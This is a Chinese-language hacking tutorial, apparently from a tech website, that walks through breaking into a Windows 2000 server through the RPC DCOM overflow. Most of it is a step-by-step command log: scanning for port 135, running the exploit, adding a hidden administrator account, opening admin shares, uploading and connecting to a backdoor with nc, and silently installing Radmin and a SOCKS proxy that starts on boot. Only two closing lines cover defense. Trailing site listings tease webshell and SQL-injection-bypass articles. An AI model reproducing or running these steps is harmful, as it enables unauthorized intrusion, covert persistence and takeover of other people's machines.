dcomrpc入侵的步骤是什么?如何用脚本开启telnet来开共享?
需要的工具:
很好的:radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后门程序:WinEggDropShellPro3thVersion
好了,该做的都做的差不多了。现在开始把~~首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必随便扫一下就会发现有许多主机开放的135端口)。。。。。。(人走运座着都能检到钱) 211.217.50.xx第一个主机就被扫出来又此漏洞。开始工作看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k哈哈,是win2k server版本
展开命令行:[查看dcomrpc的用法用法 dcomrpc -d
Options:
-d:Hostname to attack [Required]
-t:Type [Default: 0]
-r:Return address [Default: Selected from target]
-p:Attack port [Default: 135]
-l:Bindshell port [Default: 666]Types:
0 [0x0018759f]: [Win2k-Universal]
1 [0x0100139d]: [WinXP-Universal]
开始进行溢出:
F:\hack>cd rpc\dcomrpc -d211.217.50.xx 0RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host..
[ ] Done.
[ ] Expl01ting....Just wait......等到出现,说明溢出成功
c:\winnt\system32>接着我们建立用户c:\winnt\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。
看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share
清单是空的。c:\winnt\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$Content$nbsp;
命令成功完成。到这里我们入侵告一段落
[ 建 立 IPC$Content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接]F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; [ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet
使用opentelnet.exe 关闭开启的telnet使用resumetelnet \\ip user password
如果忘记开共享可以使用脚本开启telnet来开共享,用法:
cscript telnet.vbe ip user password null port (null是验证方式)F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567F:\hack>telnet 211.217.50.xx 4567
省略...连接并运行后门程序,运行后门程序命令根目录:inject.exe -run
(后门使用方法和安装都在zip文件里面包含了)后门端口123456
F:\hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version[Melody]# 下面安装radmin配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe把这个4个文件copy c:\winnt\system32在目录下面执行命令
c:\winnt\system32>r_server /s radmin.reg -----导入注册表c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘c:\winnt\system32>net start r_server----- 启动服务
可以开启3389的话你自己看着办把,哈哈
安装sock代理
把sksockserver.exe copy c:\winnt\system32c:\winnt\system32>sksockserver /install-----安装服务c:\winnt\system32>sksockserver -config port 1234----端口定在1234自己可以改c:\winnt\system32>sksockserver -config starttype 2----开机自动启动c:\winnt\system32>net start skserver ----启动服务 最后删除共享
net share ipc$Content$nbsp;/del
net share admin$Content$nbsp;/del
在安装radmin的时候你发现有人已经安装了。。怎么办?走人?--------NO
看操作 (我输入的内容)后门连接F:\hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version[Melody]#(pslist)[Melody]#(pskill r_server)[Melody]#(shell)c:\winnt\system32>(del r_server.exe)c:\winnt\system32>(del admdll.dll)c:\winnt\system32>(del raddrv.dll)
copy你自己的上去,然后安装省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密码
等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。完了,努力白费了。。。。。。。 -----------------------------NO出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。。呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的嗬嗬,去试试看吧
防御办法:
安装rpc补丁
使用防火墙过滤135,445,139等端口
网站被黑的经过 怎么防止网站被黑?
网站会被黑了 现在想想 有哪些方面的经验给大家借鉴一下
详情2018-01-20 17:30:08责编:llp 来源:驱动管家演示科讯的漏洞 怎么找到科讯的漏洞?
现在程序在不断的发展,更新。漏洞也不断的出现。今天来给大家演示一下科讯的漏洞,简单拿大站的WebShell 在百度或者GOOGEL搜索,科讯的注册关键字,因为这个漏洞就出自于头像上传。关键字为(小提示:在输入用户
详情2018-02-06 16:19:20责编:llp 来源:驱动管家防止用户隐私泄露要学会禁用cookie功能
随着网络安全知识的普及,越来越多的用户知道了Cookie功能会造成用户的隐私泄露,Cookie实际上是一些小的数据包,里面包含着关于你网上冲浪习惯的信息,可以方便你以后的操作,但随后就为因特网上了解Cookie的站
详情2018-03-03 14:02:21责编:llp 来源:驱动管家学习扫描入侵一条龙操作,帮助读者了解攻击和防御的知识
很多网上安全教程都介绍了如何通过百度和GOOGLE来搜索漏洞代码而发动攻击,这种文章在实际应用中没有什么价值,毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。只有学会针对某定点
详情2018-02-16 21:05:09责编:llp 来源:驱动管家大蜘蛛杀毒软件怎么卸载?大蜘蛛杀毒软件的卸载方法
Dr Web大蜘蛛反病毒2008专业版,在软件程序设计的又如何呢,我们今天来检查一下它的卸载过程。
详情2018-01-04 10:30:53责编:llp 来源:驱动管家可扩展协议http有哪些常用的安全头部?http协议安全头部的优势
它曾是世界性图书馆梦的开始,现在它是全球知识的聚集地,它是目前最流行的,人们将应用都部署之上的万维网。它是敏捷的代表,它不是单一的实体,它由客户端和服务端组成,它的功能在不断地强大,它还有标准。虽
详情2018-02-13 15:45:42责编:llp 来源:驱动管家rar密码破解工具:rar password recovery如何破解rar文件密码?
RAR是一款常见的压缩格式,主要运用于文件的存储与传递。互联网上提供下载的资源中,RAR格式占很大比重。出于安全的需求以及隐私的保护,有相当一部分的RAR文件被加上了密码,解不开密码的RAR文件如同垃圾文件一
详情2018-01-15 12:34:15责编:llp 来源:驱动管家网上哪些方法破解不了pubwin ep?pubwin ep要怎么破解?
这边的网吧都用pubwin EP 5 000000069****(忘记勒^_^)的网络管理系统,操作系统用WINDOWS XP,另外还装了还原精灵,呵呵。BIOS、系统、还原精灵、pubwin EP都设置了不同的密码。我搜索并尝试了网上所谓的破解
详情2018-01-30 18:07:59责编:llp 来源:驱动管家绕过SQL注入限制的方法 怎么绕过select这个关键字?
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所
详情2018-03-01 18:06:41责编:llp 来源:驱动管家无线网络安全怎么提高?提高无线网络安全的方法
如下具体解析提高无线网络安全的几个妙招:1 无线加密首先说一下无线加密,这种保护方式是目前最为常见的一种手段,用户可以通过无线路由器的WEB界,来对无线网络进行加密设置。目前,无线路由器或AP的加密类型一
详情2018-01-09 13:34:07责编:llp 来源:驱动管家
- 打开office文件的时候文件缩略图变成白板怎么解决
- 在wps表格中怎样才能快速输入菱形符号
- 电脑机箱电源容易发生的故障有哪些?
- RX 470D和GTX1050 Ti哪个好?GTX1050Ti对比RX470D
- 景驰科技正式加入百度Apollo开放平台 前CEO王劲已辞去CEO职位
- 微软SwiftKey输入法推送更新 新增支持9种新语言
- 电脑升级系统之后想要还原成原始的状态怎么操作
- Linux系统格式化分区时提示Could not start /dev怎么办?
- 红辣椒note安兔兔测试 红辣椒note性能怎么样?
- 美图m4支持什么网络?美图m4什么时候发布?
- 谷歌平板Nexus 7和苹果平板iPad 2哪个好
- 键盘的功能与应用知识大全 键盘简介
- 隐藏账号有哪些类型?如何彻底清除隐藏账号?
- 你知道安全狗如何加用户吗?这里有一种简单方法
- 在word中插入相片太大怎么调整?word调整相片的方法
- win8电脑设置语音识别的方法有哪些
- 电脑键盘按键失灵有什么办法解决
- 头戴式耳机怎么样?头戴式耳机有哪些优缺点
- U12搭载了骁龙845的处理器
- 全国累计推进37667家企业实现软件正版化